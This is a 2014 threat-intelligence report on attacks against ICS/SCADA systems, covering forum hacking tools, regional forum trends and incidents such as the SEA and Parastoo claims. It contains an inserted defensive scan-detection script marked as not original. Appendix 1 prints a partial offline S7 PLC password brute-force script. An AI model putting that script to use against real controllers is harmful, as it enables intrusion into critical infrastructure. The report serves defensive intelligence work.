2014 © SenseCy PO Box 8551, Poleg Netanya 4250711, Israel Tel +972-9-7482180 Israel [email protected] 1 Cyber Threats to ICS/SCADA Systems

    Cyber Intelligence Report: Cyber Threats to ICS/SCADA Systems

    Executive Summary

    Recent years have witnessed an increased awareness within the worldwide security community of

    risks related to cyber attacks against critical infrastructures. ICS/SCADA systems have been a

    particular cause of concern for the security community, owing to Stuxnet, Flame and other cyber

    threats. As automation continues to evolve and assumes a more important role worldwide, the use

    of ICS/SCADA systems is likely to increase accordingly.

    In late August 2014, for example, over 300 companies in the oil and energy sector received a

    warning from the Norwegian authorities regarding a large-scale hacker attack. The attack was

    described as a spear-phishing attempt aimed at key personnel in the targeted companies, with the

    goal of injecting a Trojan or virus into company systems.1

    Additionally, in recent months numerous cyber security firms have conducted research into the

    relatively new variants of Havex malware used to execute attacks against ICS and SCADA systems. By

    attaching the malware to certain software available for download from ICS/SCADA manufacturer

    websites, the attackers succeeded in compromising SCADA-related systems.2 And, in late September

    2014 a new large-scale vulnerability, ShellShock, captured global attention as one of the most

    prominent vulnerabilities discovered recently.

    This research includes a comprehensive review of the SCADA field and recent significant incidents,

    SCADA vulnerabilities and exploits. This report is based on the data collected from a variety of

    sources, including cyber blogs, closed forums, platforms for uploading stolen and leaked

    information, as well as social networks. These web searches focused on the key cyber arenas and

    were conducted in Chinese, Russian, Persian, Arabic and English. The report is divided into three

    main chapters:

    Analysis of malicious tools and hacking methods

    Discussions and trends on closed and password-protected forums

    Reviewing SCADA-Related Cyber Incidents

    1 http://www.newsinenglish.no/2014/08/27/oil-industry-under-attack-by-hackers/

    2 http://securityaffairs.co/wordpress/26092/cyber-crime/cyber-espionage-havex.html

    Table of Contents

    Analysis of Malicious Tools and Hacking Methods
    Brute-Force Tool for PLC Component Siemens S-7
    ScadaScan Tool
    PLCScan Tool
    SCADA Vulnerability Assessment Online Guide
    Discussions and Trends on Closed and Password-Protected Forums
    Iranian Sources
    Chinese Sources
    Russian Sources
    Arabic Sources
    English Sources
    SCADA-Related Cyber Incidents
    New Vulnerability Poses Possible Threat to ICS and SCADA Systems
    What this Means
    The Syrian Electronic Army Hacks into Israeli SCADA Systems
    The Syrian Electronic Army (SEA)
    Iranian Hacker Group Implicates itself in Physical Attack on Electric Power Facility
    Parastoo
    Jihadist Cyber Terror Group to Target SCADA Systems
    Conclusion
    Appendix 1: Brute-Force Tool Full Script
    Appendix 2: Technical Indicators for the SCADA-Related Tools
    Brute-Force Tool for S-7
    ScadaScan
    PLCScan
    Appendix 3: Full Translation of Yaman Mukhaddab's Message

    Analysis of Malicious Tools and Hacking Methods

    SenseCy operates numerous virtual entities over a range of web platforms, such as cyber blogs,

    professional forums and closed hacking forums. This research includes searches for malicious tools

    and hacking methods relevant to SCADA systems. Being a hot topic, the SCADA field is a major point

    of interest for many hacker groups and individual hackers.

    SenseCy has identified several SCADA-oriented hacking tools, on both Iranian and Chinese hacking

    forums.

    Brute-Force Tool for PLC Component Siemens S-7

    The first is a brute-force tool aimed at the widespread Siemens S-7 PLC components. The tool was found on an Iranian hacking forum and is capable of executing a dictionary-based brute-force attack. The tool analyzes captured network traffic, divides it into sub-divisions, locates specific elements and then executes a brute-force attack on them.

    SenseCy contacted Siemens representatives and informed them about this tool. We received the

    following reply:

    Designated room for SCADA hacking on a hacking forum

    ...As a general security measure, Siemens recommends that asset owners configure the environment according

    to our operational guidelines3 in order to run the devices in a protected IT environment and to avoid

    unauthorized network captures.

    We respectfully suggest that you check to confirm that Siemens operational guidelines4 are being

    followed correctly and thus safeguard yourself from this exploit.

    For the full tool script, please see Appendix 1.

    ScadaScan Tool

    A second tool, ScadaScan, was found on a Chinese hacking forum. This tool was written by Amol Sarwate from Qualys and is similar to the tool mentioned above. It, too, has brute-force capabilities, along with an option to scan and locate protocols widely used in SCADA systems. The tool essentially scans to locate Modbus and DNP protocols (over TCP). The script can be implemented as part of a larger suite.

    3 http://www.industry.siemens.com/topics/global/en/industrial-security/Documents/operational_guidelines_industrial_security_en.pdf

    4 Ibid.

    The hacking tool as presented on the forums (left); part of its script (right)

    Screenshot of ScadaScan in action

    PLCScan Tool

    Another hacking tool found in the Chinese cyber arena is PLCScan. This is a scanning tool designed to locate PLC devices based on an IP range scan. It locates the IP and the relevant open ports on the device. This tool supports the S7 and Modbus protocols. For technical indicators based on our analysis of the malicious tools, see Appendix 2.
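
A defender-side view of how ScadaScan- and PLCScan-style activity appears on the network, as an added example that is not part of the original report: it flags any source that contacts many distinct hosts on a single ICS port within a short window. The flow-log format, addresses, allowlist and thresholds are constructed assumptions; the ports are the standard TCP ports for S7 (102), Modbus/TCP (502) and DNP3 (20000).

```python
import csv
import io
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Standard TCP ports of the protocols these scanners look for.
ICS_PORTS = {102: "S7 (ISO-TSAP)", 502: "Modbus/TCP", 20000: "DNP3"}

# Assumption: hosts that legitimately poll many PLCs (HMI, historian).
KNOWN_MASTERS = frozenset({"10.10.0.5"})

# Constructed flow log: timestamp, source, destination, destination port.
SAMPLE_FLOWS = """\
2014-10-01T08:00:00,10.10.0.5,10.10.1.1,502
2014-10-01T08:00:01,10.10.0.5,10.10.1.2,502
2014-10-01T08:00:02,10.10.0.5,10.10.1.3,502
2014-10-01T08:00:03,10.10.0.5,10.10.1.4,502
2014-10-01T08:00:04,10.10.0.5,10.10.1.5,502
2014-10-01T08:05:00,10.10.2.20,10.10.1.1,102
2014-10-01T08:05:30,10.10.2.20,10.10.1.2,102
2014-10-01T09:14:00,10.10.9.77,10.10.1.1,502
2014-10-01T09:14:01,10.10.9.77,10.10.1.2,502
2014-10-01T09:14:02,10.10.9.77,10.10.1.3,502
2014-10-01T09:14:03,10.10.9.77,10.10.1.4,502
2014-10-01T09:14:04,10.10.9.77,10.10.1.5,502
2014-10-01T09:14:05,10.10.9.77,10.10.1.1,102
2014-10-01T09:14:06,10.10.9.77,10.10.1.2,102
2014-10-01T09:14:07,10.10.9.77,10.10.1.3,102
2014-10-01T09:14:08,10.10.9.77,10.10.1.4,102
2014-10-01T09:14:09,10.10.9.77,10.10.1.5,102
2014-10-01T09:20:00,10.10.9.77,10.10.1.9,443
not,a,valid,record
"""


def parse_flows(text):
    """Yield (timestamp, src, dst, dport) tuples, skipping malformed rows."""
    for row in csv.reader(io.StringIO(text)):
        if len(row) != 4:
            continue
        ts, src, dst, dport = (field.strip() for field in row)
        try:
            yield datetime.fromisoformat(ts), src, dst, int(dport)
        except ValueError:
            continue


def detect_sweeps(flows, min_hosts=5, window=timedelta(seconds=60),
                  allow=KNOWN_MASTERS):
    """Alert once per (source, ICS port) that reaches min_hosts distinct
    destinations inside the sliding time window."""
    recent = defaultdict(deque)   # (src, port) -> deque of (timestamp, dst)
    alerted = set()
    alerts = []
    for ts, src, dst, dport in sorted(flows):
        if dport not in ICS_PORTS or src in allow:
            continue
        key = (src, dport)
        seen = recent[key]
        seen.append((ts, dst))
        # Drop contacts that have aged out of the window.
        while ts - seen[0][0] > window:
            seen.popleft()
        hosts = {d for _, d in seen}
        if len(hosts) >= min_hosts and key not in alerted:
            alerted.add(key)
            alerts.append({
                "src": src,
                "port": dport,
                "protocol": ICS_PORTS[dport],
                "hosts": len(hosts),
                "first_seen": seen[0][0],
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_sweeps(parse_flows(SAMPLE_FLOWS)):
        print("{first_seen} {src} swept {hosts} hosts on "
              "{protocol} (tcp/{port})".format(**alert))
```

The allowlist matters as much as the threshold: in the sample data the polling master touches as many PLCs as the scanner does, and only its presence in `KNOWN_MASTERS` keeps it from alerting.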

    SCADA Vulnerability Assessment Online Guide

    One of our most interesting findings was an online guide titled: SCADA Vulnerability Assessment. This

    guide, located on an Iranian hacking forum, is an extensive document (over 70 pages long) written in

    Persian by two Iranian hackers and divided into four main chapters:

    Introduction

    Background of Critical Infrastructure Systems

    The Different Parts in SCADA Systems

    Industrial Control Systems (ICS)

    Additional Background

    Content Review

    ICS and Critical Infrastructure

    Protocol Layers Analysis

    Modbus Protocol

    Introduction to Fuzzing

    Modbus Protocol Fuzzer

    DNP3 Protocol

    Security Assessment for ICS

    Penetration Testing

    Presenting the Devices used in our Experiments

    Rapid Security Evaluation of ASATech RMU-2004 and DCM-2004

    Cross Debugging and Cross Compiling

    Reverse Engineering

    Fuzzing Modbus TCP Protocol

    Hardware Inspection

    Additional Components and the Threat to Critical Systems

    Example: Image of the Entire System

    Security Assessment for Schneider Electric PLC

    Example: Image of Firmware

    Appendix 1: Proof of the Exploitability of ASATech Devices

    Appendix 2: Modbus Fuzzer

    Appendix 3: Virtual Portal of GSM Shield for Arduino

    This guide reveals the tremendous interest in SCADA vulnerabilities and exploits, while displaying a

    high level of understanding. This well-written document displays a significant degree of proficiency

    on this particular subject. The structure and depth of the information, the level of detail and the description imply that a considerable amount of time was invested in it. This is without a doubt a great guide and starting point for a beginner and even a specialist in the SCADA world.

    The full document will be delivered to the client upon request.

    Online guide cover

    POC exploit code against ASATech Devices

    Discussions and Trends on Closed and Password-Protected Forums

    It is common knowledge that in recent years, SCADA has become one of the most-discussed topics in the cyber world. This chapter reviews the treatment of SCADA-related topics in the arenas covered in this report: Iranian, Chinese, Russian, Arabic and English.

    Iranian Sources

    Iran is without doubt a hotspot for SCADA enterprises, both from an academic frame of reference and for more sinister motivations, such as hacking and vulnerability exploitation. As mentioned, some hacker forums have designated rooms for SCADA hacking discussions, while some individual hackers are more SCADA-oriented than others. One example of such a hacker is Pouriya Naseri, who goes by the alias NOTER and is affiliated with the Iranian DataCoders hacker group. One document written by Naseri is titled Electro Hack and comprises three sections:

    Basic Information about Electronic & Electrical Controllers

    Example for an Attack (Electro Hack)

    Basic Information about Vulnerability of PLC & SCADA

    The full document written by Naseri will be delivered to the client upon request.

    Introductory explanation about SCADA protocols

    Introductory explanation regarding a SCADA exploit

    Chinese Sources

    Unlike hacker forums in other arenas, no dedicated rooms for SCADA were found on Chinese hacker

    forums. Discussions about SCADA-related issues are usually held in rooms with general designations,

    such as "Software Security". Most SCADA-related content is either translated to Chinese from

    English sources or directly quoted from the official sites of the manufacturers (for example warnings

    against newly uncovered vulnerabilities).

    There are several professional Chinese sites dedicated solely to SCADA. These sites typically feature

    discussion rooms, news reports, downloading areas, and articles and products for sale. In the

    discussion section, separate rooms are established for various SCADA components and different

    manufacturers such as Siemens, AB and Schneider. The information exchanged on these platforms is

    mostly professional or educational, and the forum members occasionally share vulnerabilities as

    published by the official manufacturers or by the US-CERT.

    An article about the Havex virus translated from English

    Example of different discussion rooms

    Even though we did not find a Chinese hacking blog dedicated entirely to SCADA, some blogs do

    publish SCADA-related articles and tools. Two of these tools were described above in the Malicious

    Tools and Hacking Methods chapter:

    ScadaScan

    PLCScan

    Russian Sources

    While monitoring Russian sources, SenseCy identified mostly open source reports dealing with

    SCADA vulnerabilities5 and analyses of major incidents in the SCADA field from the last few years,

    such as the Havex malware and Stuxnet.

    One example of such a report was published in June 2014 by the Russian security company USSC

    (Ural Center for System Security). This report reviewed the Havex Trojan for SCADA systems, relying

    mostly on English sources.6

    In addition, we identified several closed forums dedicated to SCADA discussions addressing mostly

    technical topics, rather than harmful activity. The members of these forums are professionals who

    work in the industry and often discuss different aspects of ICS systems.7

    5 http://internetua.com/kriticseskie-uyazvimosti-v-SCADA-pozvolyauat-hakeram-polucsit-kontrol-nad-promishlennimi-sistemami

    6 http://www.ussc.ru/articles/id/19

    7 www.Asutpforum[.]ru/viewtopic.php?f=104&t=4302&start=75

    Screenshot from the Russian report about the Havex Trojan

    It is important to note that the Russian underground is primarily devoted to financial scams that can

    turn easy profits. Russian underground players appear less concerned with attacking SCADA systems

    and are more interested in making a profit. While we cannot underestimate the capabilities of

    Russian hackers in impairing SCADA systems, such plans would most likely not be discussed on

    accessible web platforms.

    Arabic Sources

    Since 2013, Arab hackers have become more and more involved in the global petroleum industry. In

    June 2013, the infamous hacker group AnonGhost launched a hacktivist operation titled #OpPetrol, a

    cyber-campaign targeting the petroleum industry around the world. The group's official target list

    includes companies such as the Saudi Arabian Aramco, British Petroleum in the U.K. and Texaco in

    the U.S.

    The #OpPetrol operation is responsible for defacements of the websites of petroleum companies

    and the leakage of valuable data such as usernames, passwords and personal details.

    A discussion from a professional SCADA forum about protecting a work

    station with ICS systems installed on it

    An announcement on the official AnonGhost Twitter account

    However, security experts are often more concerned about advanced hackers who could

    compromise SCADA systems or ICS in the petroleum industry.8

    Discussions pertaining to SCADA-related topics from Arabic sources focus on the importance of

    SCADA systems and the significant damage that could result if these systems were to be

    compromised in an operation like #OpPetrol.

    SCADA systems are mentioned on white hat platforms as well. One such platform is a Facebook page

    titled "Teaching Hack for Arabs" that promises to teach people how to hack SCADA systems and

    other control systems in order to become security experts.9

    Another example of SCADA hacking practices is a tweet posted on December 3, 2013 by Abdulla el-Aly, a Kuwaiti information security (IS) expert and CEO of Cyberkov Ltd. This tweet comments on hacking SCADA as part of a course at a black hat conference. El-Aly uploaded a picture of the various tools that he uses to hack the system.10

    8 https://blog.cyberkov.com/?s=%D8%B3%D9%83%D8%A7%D8%AF%D8%A7

    9 https://www.facebook.com/pages/Teaching-Hack-For-of-Arabs/323714387692923?sk=app_106171216118819

    10 https://twitter.com/3bdullla/status/275698599789211648; https://twitter.com/3bdullla

    A post from a Facebook page about teaching SCADA hacking

    Another forum discussion thread about SCADA was started on September 25, 2013 on the Arabic

    forum, Dev-Point, a platform dedicated mostly to developers' discussions. Hacker al-Basra al-Iraqi

    inquired about ways to hack SCADA systems. Another hacker called SkAnDeR X replied that he had

    never heard of any hacker who had succeeded in breaching SCADA systems but he hoped that

    someone would do so in the future. A third hacker named al-Safah provided detailed technical

    information about SCADA systems and claimed that a simple computer with BackTrack Linux

    distribution created for penetration testing was insufficient for hacking a SCADA system. A hacker

    named Black Ghost claimed that there were many ways to hack SCADA systems, by exploiting its

    vulnerabilities for instance. He also mentioned that in 2011, a vulnerability was identified in

    KingView SCADA software and exploited via Metasploit. Moreover, he claimed that SCADA systems

    could be hacked by radio waves, a method requiring close proximity to the system. Another hacker

    with the alias Muslim Aqeel provided a link to VUPEN Security Research's11 "7T Interactive Graphical

    SCADA Systems (IGSS) Remote Memory Corruption" from May 24, 2011.12

    Another source for SCADA-related topics is military forums. In January 2014, a review about PLC with

    an emphasis on traffic systems13 was posted on the Arabic-Military forum.

    11 www.seclists.org/bugtraq/2011/May/168; www.vupen.com/english/research.php

    12 www.dev-point[.]com/vb/t431641.html

    13 http://www.arabic-military[.]com/t90369-topic

    Tweet by a Kuwaiti IS expert on

    SCADA hacking

    In conclusion, the information accumulated from Arabic sources is mostly general, with references

    to SCADA vulnerabilities, but with no actual tools or detailed methods for hacking SCADA systems or

    endangering critical infrastructure systems.

    English Sources

    Throughout our research, we noticed a large variety of discussions on the topic of SCADA. Most

    discussions revolved around theoretical attacks of critical infrastructures,14 where users discussed

    the implications and complexities of attacking large organizations and strictly supervised

    infrastructures. Few forum threads showcased security holes discovered by forum members in

    critical infrastructure software and hardware. However, most of the showcased vulnerabilities were

    published by major security firms.

    Critical infrastructure companies were mentioned on a platform commonly used by hackers for

    leaking sensitive information and target lists.15

    On another Pastebin upload from 2013, organizers called on participants to use DDoS tools to attack

    governmental and major corporate websites.16 Several malware developers even offered their

    customized DDoS tools, designed specifically to take down carefully monitored and powerful servers.

    14 http://www.garage4hackers[.]com/showthread.php?t=2431

    15 http://pastebin.com/bHvn7rwe

    16 http://pastebin.com/Bqak4Mjm

    Screenshot of a PLC review on the Arabic-Military forum

    A list of IPs posted on Pastebin

    In addition to the Pastebin upload, SenseCy identified a post on a closed forum reviewing an exploit

    found at a U.S. water power plant. This exploit is being offered online by the hacker who created it.

    He showcased screenshots of the system interface, as well as his mail discourse with the Industrial

    Control Systems Cyber Emergency Response Team (ICS-CERT) in the course of which CERT expressed

    great interest in the exploit's capabilities.17

    One vulnerability disclosed in another discussion on this closed forum was an unauthorized access

    vulnerability that affects many SCADA systems and remote Netgear. The vulnerability is used to

    brute-force HTTP login panels, and its exploitation is explained in a step-by-step guide.18

    17 http://www.alboraaq[.]com/forum/showthread.php?t=269076

    18 http://www.alboraaq[.]com/forum/showthread.php?t=381388

    Screenshots of the SCADA control panels taken by the hacker as proof

    The hacker's proof of concept for his exploitation of the vulnerability

    SCADA-Related Cyber Incidents

    New Vulnerability Poses Possible Threat to ICS and SCADA Systems

    In late September 2014, ShellShock, a new large-scale vulnerability, captured global attention as one of the most prominent vulnerabilities discovered recently.19

    Shellshock, or Bashdoor, named after the Unix Bash shell it takes advantage of, is especially relevant for Unix-based operating systems, such as Linux and Apple's OS X. Apple, for its part, addressed the news about this vulnerability and clarified that the vast majority of OS X users are safe and that Apple will soon release a security update for users who configure advanced UNIX services and might be vulnerable to this security flaw.20

    One of the major issues with this vulnerability, described by some as "Bigger than Heartbleed",21 is its possible effect on SCADA systems and ICS (Industrial Control Systems).22 According to different publications, much-needed security updates may not even be available for such systems running unsupported versions of Linux. In addition, many ICSs outlive the manufacturer's recommended lifespan.23 Moreover, multiple firms and corporations have warned their customers of the possible threat this new vulnerability poses, listing unpatched and vulnerable products.24

    Other than various news items about Shellshock, SenseCy identified several references to this newly

    discovered vulnerability on different hacking forums. One example is an Iranian hacking forum

    where members posted detailed explanations on this vulnerability.

    19 http://www.slate.com/articles/technology/technology/2014/09/shellshock_what_you_need_to_know_about_the_bash_vulnerability.html

    20 http://www.macworld.com/article/2687826/apple-says-most-mac-users-are-safe-from-shellshock-bash-bug-promises-quick-fix.html; http://krebsonsecurity.com/2014/09/apple-releases-patches-for-shellshock-bug/

    21 http://www.pcworld.com/article/2687857/bigger-than-heartbleed-shellshock-flaw-leaves-os-x-linux-more-open-to-attack.html

    22 http://www.v3.co.uk/v3-uk/analysis/2372312/bash-shellshock-bug-puts-servers-scada-and-web-world-at-risk

    23 http://news.softpedia.com/news/Industrial-Control-Systems-Equipment-Difficult-to-Patch-Against-Shellshock-Bug-460061.shtml

    24 http://articles.economictimes.indiatimes.com/2014-09-27/news/54377111_1_solaris-bug-products; http://news.softpedia.com/news/New-Remote-Code-Execution-Flaws-Found-In-Shellshock-Patched-Bash-460348.shtml

    What this Means

    The vast majority of critical system management runs on some version of UNIX or Linux. In most cases, it is a specially designed version and the organizations do not know how to patch it (if a patch is even available), and in worst-case scenarios, the vendor does not provide any updates or patches for the systems, specifically because of their uniqueness. This particular vulnerability is so fundamental that it can provide access to critical assets with minimum effort. This powerful exploit can enable an attacker to execute arbitrary commands on the system.

    Even more worrisome is the fact that immediately following the release of Shellshock, more

    implementations and variants of this vulnerability (Bash-related) were found. There are already

    indications of various bots using this vulnerability. And if we take into consideration that the bug

    dates back to the initial versions of bash, we can only speculate where it will end, if at all.

    Forum post detailing related scripts

    The Syrian Electronic Army Hacks into Israeli SCADA Systems

    On May 6, 2013, the cryptome.org website reported a successful attack by the "Syrian Electronic Army" (SEA) on a strategic Israeli infrastructure system in Haifa. In an email sent to the website, the attack was declared to be a warning to decision-makers in Israel, evoking alleged Israeli Air Force (IAF) attacks on Syrian territory at the beginning of May 2013. The claim of responsibility for the attack was accompanied by a .pdf file with screenshots substantiating the cyber attack.25

    Examination of the screenshots proved that the attack was authentic, but was not aimed at a Critical

    National Infrastructure (CNI) like the municipal water SCADA system in Haifa. Our research did,

    however, reveal that the attackers had targeted the irrigation control system of Kibbutz Sa'ar, near

    Nahariya. Control of this system would present the hacker with numerous capabilities, among which

    is the destruction of the agricultural yield.

    We also noticed that the time shown on the screenshot indicated the end of April 2012. It is possible that the system clock was incorrectly set, but it is more likely that the system was breached a year ago and the published "Retaliatory Strike" was retained as a contingency plan for exactly such an attack by Israel.

    The Syrian Electronic Army posted a denial via its Twitter account, where it stated that it was not behind the attack.26 On other occasions, this Twitter account has been used as a platform for claims of responsibility, but in this incident, the above attack is not mentioned, either there or on the group's official website or forums (apart from the denial). It should be noted that there are numerous examples of fictitious claims of responsibility intended to deflect identification of the attacker, an MO (Modus Operandi) of state-sponsored hacker groups.

    25 http://cryptome.org/2013/05/sea-haifa-hack.htm, http://pastebin.com/aRCHLeRr

    26 https://twitter.com/Official_SEA12/status/332172497397088256

    Screenshot from the PDF released by the attackers

    This incident is another link in a chain of events demonstrating an impressive ability to locate and exploit SCADA systems that appear to be susceptible to the Muslim hackers' skills. However, in our

    view, this event is unprecedented. For the first time in public, a critical computerized infrastructure

    facility on Israeli soil has been attacked, and it is extremely likely that a sovereign state is behind the

    attack, declaring outright war in the cyber arena and deviating from the intelligence-gathering

    plateau.

    The Syrian Electronic Army (SEA)

    The Syrian Electronic Army (SEA), a group of hackers working in support of Syrian President Bashar

    al-Assad, first emerged in mid-2011 during the first Syrian uprisings, when it started attacking a wide

    array of media outlets. Its campaign includes DDoS attacks, phishing, pro-Assad defacements and

    spamming against governments, online services, and media organizations that are perceived hostile

    to the Syrian government.27 The SEA's primary goal is to improve the Syrian government's image and

    target its opponents and critics.

    Notable Activities

    To date, the SEA has successfully targeted Associated Press (AP), CNN, BBC, Daily Telegraph,

    Financial Times, Guardian, The Washington Post, The New York Times, and more. Its most famous

    operation was an announcement via AP's Twitter account according to which the White House was bombed and President Obama injured. The tweet caused the stock market to briefly dip more than $100 billion.28

    27 http://www.fireeye.com/blog/technical/cyber-exploits/2013/07/syrian-electronic-army-hacks-major-communications-websites.html

    28 http://www.vice.com/read/the-syrian-electronic-army-almost-crashed-the-dow-jones

    SEA denial on their Twitter account

    In May 2013, the cryptome.org website reported a successful attack by the SEA on a strategic Israeli infrastructure system in Haifa. Examination of the screenshots proved that the attack was authentic, but was not aimed at a Critical National Infrastructure (CNI) like the municipal water SCADA system in Haifa. Our research did, however, reveal that the attackers had targeted the irrigation control system of a Kibbutz 30km north of Haifa. Nevertheless, it proves their growing capability and may indicate cooperation between the group and other state actors in the region.

    Methods of Operation

    The SEA is very active on social media networks, including Twitter, Facebook, Google+, YouTube,

    Instagram, Pinterest, and smartphone apps. The group also runs an official website, SEA.sy, where it

    appeals for volunteers to promote and aid its cause using social media.29 The group often sends

    socially-engineered spear-phishing emails to lure the victim into opening weaponized and malicious

    documents.30

    29 http://www.memri.org/report/en/0/0/0/0/0/0/7357.htm

    30 http://www.theregister.co.uk/2013/08/01/sea_analysis/

    The drop in the Dow Jones after the SEA's Obama tweet

    Summary

    The SEA's exact relationship to the Syrian regime remains unclear. We believe, however, that the group is not just working in support of the Syrian government, but rather operating under its orders and guidance. In any case, recent months have proven that the SEA has emerged as a much more serious threat not only to media outlets but also to government agencies, corporations and perhaps even critical infrastructure systems around the world.

    Having said that, it is important to emphasize that the group does not currently have the capability to cause the kind of damage that nation-state actors like China, Russia and even Iran can.

    In a scenario involving an American strike on Syria, we expect that the SEA will retaliate and wage, perhaps with the help of state-sponsored Iranian hacker groups, cyber attacks against U.S. and Western targets, such as media organizations, financial institutions, government entities and critical infrastructure systems.

    SEA's Twitter account (left); "Volunteering in the SEA" (right)

    Iranian Hacker Group Implicates itself in Physical Attack on Electric Power Facility

    On January 2, 2014, the Cryptome.org website (a digital library host) published a message from the

    Iranian hacker group "Parastoo", directed at the American authorities. The message headline

    connects the group to a "military-style" attack on an electric power station, the PG&E Metcalf

    substation, in California, U.S.A. on April 16, 2013. The connection to the Iranian group is unclear,

    despite the fact that Parastoo has mentioned that it has been testing national critical infrastructures

    using cyber vectors.31

    On April 16, 2013, an undetermined number of individuals breached the PG&E Metcalf power

    substation in California and cut the fiber-optic cables in the area around the station. The act

    neutralized some local 911 services and temporarily disrupted cell phone service in the area. The

    perpetrators also fired shots from high-powered rifles at several transformers in the facility. Ten

    were damaged and several others shut down.

    Despite the fact that the attack is being treated as vandalism, the FBI has taken over the case. There

    appears to have been some initial concern, or at least interest, in the fact that the shooting occurred

    one day after the Boston Marathon attacks. But according to the FBI, there is no evidence at this

    time relating the attack to terrorism.32

    31 http://cryptome.org/2014/01/parastoo-pge-metcalf.htm

    32 http://complex.foreignpolicy.com/posts/2013/12/24/power-station-military-assault#sthash.EpAunaEs.8OPXCTqS.dpbs, http://www.dailymail.co.uk/news/article-2530879/FBI-investigates-military-style-attack-California-power-station.html

    Cryptome message

    It should be noted that there have been several attacks against different infrastructure facilities in

    the U.S. in the past year, such as the Arkansas power grid. Furthermore, officials conceded that the

    electric power industry is focusing on the threat of cyber attacks.33

    Parastoo

    The Iranian hacker group Parastoo34 first emerged on November 25, 2012, when they posted a

    message announcing they hacked into the International Atomic Energy Agency (IAEA) and leaked

    personal details of its officials.35

    In February 2013, Parastoo claimed to have stolen nuclear information, credit card information, and

    the personal identities of thousands of customers, including individuals associated with the U.S.

    military, that work with IHS Inc., a global information and analytics provider.36

    In March 2013, several weeks prior to an April 7 anti-Israeli cyber operation, Parastoo announced

    that they would demonstrate "a new generation of APT on political, social, financial cyber entities"

    during the upcoming #OpIsrael campaign.37 The campaign itself included mostly DDoS, defacement

    and SQLi attacks on official and private Israeli websites. We have found no evidence that APT tools were used during this cyber operation.

    33 http://complex.foreignpolicy.com/posts/2013/12/24/power-station-military-assault#sthash.EpAunaEs.8OPXCTqS.dpbs, http://www.dailymail.co.uk/news/article-2530879/FBI-investigates-military-style-attack-California-power-station.html, http://www.nytimes.com/2013/10/09/us/power-grid-is-attacked-in-arkansas.html?_r=0

    34 Parastoo means swallow (the bird) in Persian.

    35 http://cryptome.org/2012/11/parastoo-hacks-iaea.htm, http://pastebin.com/SdYaPUwr

    36 http://cryptome.org/2013/02/parastoo-janes-cbrn.htm, http://freebeacon.com/anti-israel-hacking-collective-strikes-again/, http://wikileak.ir/en/leaks/13

    37 http://cryptome.org/2013/03/parastoo-mt-apt.htm

    Operation Roohollah Parastoo claims to have hacked into IHS Inc.

    On July 3, 2013, Parastoo claimed to have launched a UAV flight on U.S. soil.38 Several days later, they published a short, mysterious video allegedly documenting a UAV watching a U.S. aircraft carrier.39

    We do not have any information regarding the members of the group, but we believe this to be an

    anti-American and anti-Israeli hacker group, likely supported by the Iranian regime like other Iranian

    groups.

    Jihadist Cyber Terror Group to Target SCADA Systems

    On June 11, a prominent Web Jihadist from the Shumukh al-Islam forum, Yaman Mukhaddab,

    launched a campaign to recruit male and female volunteers for a new Electronic Jihad group. The

    campaign, which takes place over the thread itself, begins with a clear definition of the group's tasks

    and priorities. Mukhaddab says:40

    Simply put, it is a cyber-terror base, for launching electronic terror attacks on major infidel

    powers, specifically the U.S., the U.K. and France, no others. This base is not going to attack,

    for instance, the sites of Shia, Christians, apostates, slanderers, liar sites and forums or

    anything else. I repeat: it will only target the U.S., the U.K. and France.

    Mukhaddab goes on to list the main targets for future attacks. SCADA systems are ranked as a top priority target, in order to destroy power, water and gas supply lines, airports, railway stations, underground train stations, as well as central command and control systems in these three countries. The second priority includes control systems of general financial sites, such as central savings organizations, stock markets and major banks. Third on the group's agenda are websites and databases of major corporations dominating the economies of these countries, while fourth and last are less specified public sites affecting the daily routine of citizens, in order to maximize the terror effects on the population.

    38 http://cryptome.org/2013/07/parastoo-uav-launch2.htm

    39 http://www.hongpong.com/archives/2013/07/07/mysterious-parastoo-apparent-iranian-hacker-group-claims-uav-flight-inside-usa-r, http://www.youtube.com/watch?v=lmuScdQPMFc&feature=player_embedded

    40 See Appendix 3 for a full translation of Mukhaddab's message.

    Mukhaddab details the desired skills of anyone wishing to join the group, including: thorough

    understanding of SCADA systems, preferably with experience in hacking them; acquaintance with

    writing hacking programs and scripts, and programming in C, C+ and C++ languages; expertise in

    networks, communication protocols and various kinds of routers and firewalls, specifically

    mentioning CISCO; expertise in Linux or Unix operating systems; expertise in Windows operating

    system; capability of detecting security vulnerabilities; acquaintance with hacker websites, capability

    of entering them easily, searching for required scripts, tools, or software, and providing them to

    fellow members, if asked to; complete mastery of English or French scientific language, and scientific

    background in computer engineering; mastery of the Russian language; and mastery of the Chinese

    language. Members who want to volunteer are asked to post a response in the thread, specifying

    the categories that fit their capabilities.

    To date, close to a hundred volunteers have already signed on to Mukhaddab's Electronic Jihad

    group. We have yet to see indications that this newly formed group has started to engage in online

    hacking activity, but given the enthusiasm it created among forum members, this is likely to occur in

    the near future.

    Conclusion

    The purpose of this report is to provide a thorough review of the SCADA field in major cyber arenas.

    This report included information regarding malicious tools and methods for hacking SCADA systems

    and a review of major cyber arenas and the practice of SCADA-related topics.

    The report included an analysis of hacking tools for SCADA systems found on Chinese and Iranian closed forums. It is clear that the SCADA field as a whole, as well as relevant vulnerabilities and exploits, is of great interest to Chinese and Iranian hackers. The report also covered discussions on closed hacking forums and reviewed significant SCADA-related cyber incidents.

    Generally speaking, we can attest that the world of SCADA hacking is becoming more and more accessible to hackers from around the world, from hacktivists to cyber criminals. In our view, both vendors and users should take into account that in the next two years, the amount of probing and research done on SCADA systems is going to be as prolific as vulnerability research on desktops and mobile systems.

    Appendix 1: Brute-Force Tool Full Script

    """
    File: s7-brute-offline.py
    Desc: offline password bruteforsing based on challenge-response data,
          extracted from auth traffic dump file
    """

    import sys
    import hashlib
    import hmac
    from binascii import hexlify

    try:
        from scapy.all import *
    except ImportError:
        print "please install scapy: http://www.secdev.org/projects/scapy/ "
        sys.exit()

    cfg_pcap_file = '/root/siemens/RE_S7/stop_cpu_cmd_right_pass_123.pcap'
    cfg_dictionary_file = 'dict.txt'

    def get_challenge_response():
        r = rdpcap(cfg_pcap_file)

        lens = map(lambda x: x.len, r)
        pckt_lens = dict([(i, lens[i]) for i in range(0,len(lens))])

        # try to find challenge packet
        pckt_108 = 0 #challenge packet (from server)
        for (pckt_indx, pckt_len) in pckt_lens.items():
            if pckt_len+14 == 108 and hexlify(r[pckt_indx].load)[14:24] == '7202002732':
                pckt_108 = pckt_indx
                break

        # try to find response packet
        pckt_141 = 0 #response packet (from client)
